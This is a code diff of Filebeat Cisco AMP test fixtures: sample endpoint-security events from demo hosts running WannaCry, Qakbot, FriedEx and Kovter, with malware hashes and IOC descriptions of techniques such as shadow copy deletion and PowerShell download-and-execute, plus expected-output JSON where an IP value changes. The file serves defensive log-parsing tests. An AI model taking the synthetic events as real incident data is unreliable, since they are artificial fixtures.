+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity 
Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}}
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json
index cfde9b3e31be..a2f6a597836e 100644
--- a/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json
+++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp7.ndjson.log-expected.json
@@ -3,7 +3,7 @@
 "@timestamp": "2021-01-14T13:06:17.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -46,7 +46,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -58,7 +58,7 @@
 "@timestamp": "2021-01-14T13:06:17.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -96,7 +96,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 1186,
+ "log.offset": 1191,
 "related.hash": [
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
@@ -105,7 +105,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -121,7 +121,7 @@
 "@timestamp": "2021-01-14T13:06:17.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -159,7 +159,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 2465,
+ "log.offset": 2475,
 "related.hash": [
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
@@ -168,7 +168,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -184,7 +184,7 @@
 "@timestamp": "2021-01-14T13:06:17.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -224,7 +224,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 3738,
+ "log.offset": 3753,
 "related.hash": [
 "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
 "84c82835a5d21bbcf75a61706d8ab549",
@@ -235,7 +235,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -251,7 +251,7 @@
 "@timestamp": "2021-01-14T13:06:17.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -291,7 +291,7 @@
 "host.os.family": "windows",
 "host.os.platform": "windows",
 "input.type": "log",
- "log.offset": 5108,
+ "log.offset": 5128,
 "related.hash": [
 "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
 "84c82835a5d21bbcf75a61706d8ab549",
@@ -302,7 +302,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "related.user": [
 "user@testdomain.com"
@@ -318,7 +318,7 @@
 "@timestamp": "2021-01-14T13:06:17.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -350,7 +350,7 @@
 "host.hostname": "Demo_WannaCry_Ransomware",
 "host.name": "Demo_WannaCry_Ransomware",
 "input.type": "log",
- "log.offset": 6470,
+ "log.offset": 6495,
 "related.hash": [
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
@@ -359,7 +359,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -371,7 +371,7 @@
 "@timestamp": "2021-01-14T12:57:46.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -405,7 +405,7 @@
 "host.hostname": "Demo_Qakbot_1",
 "host.name": "Demo_Qakbot_1",
 "input.type": "log",
- "log.offset": 7590,
+ "log.offset": 7620,
 "related.hash": [
 "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"
 ],
@@ -414,7 +414,7 @@
 ],
 "related.ip": [
 "10.10.10.10",
- "8.8.8.8"
+ "175.16.199.1"
 ],
 "service.type": "cisco",
 "tags": [
@@ -426,7 +426,7 @@
 "@timestamp": "2021-01-14T12:57:46.000Z",
 "cisco.amp.computer.active": true,
 "cisco.amp.computer.connector_guid": "test_connector_guid",
- "cisco.amp.computer.external_ip": "8.8.8.8",
+ "cisco.amp.computer.external_ip": "175.16.199.1",
 "cisco.amp.computer.network_addresses": [
 {
 "ip": "10.10.10.10",
@@ -458,7 +458,7 @@
 "host.hostname": "Demo_Qakbot_1",
 "host.name": "Demo_Qakbot_1",
 "input.type": "log",
- "log.offset": 8772,
+ "log.offset": 8807,
 "related.hash": [
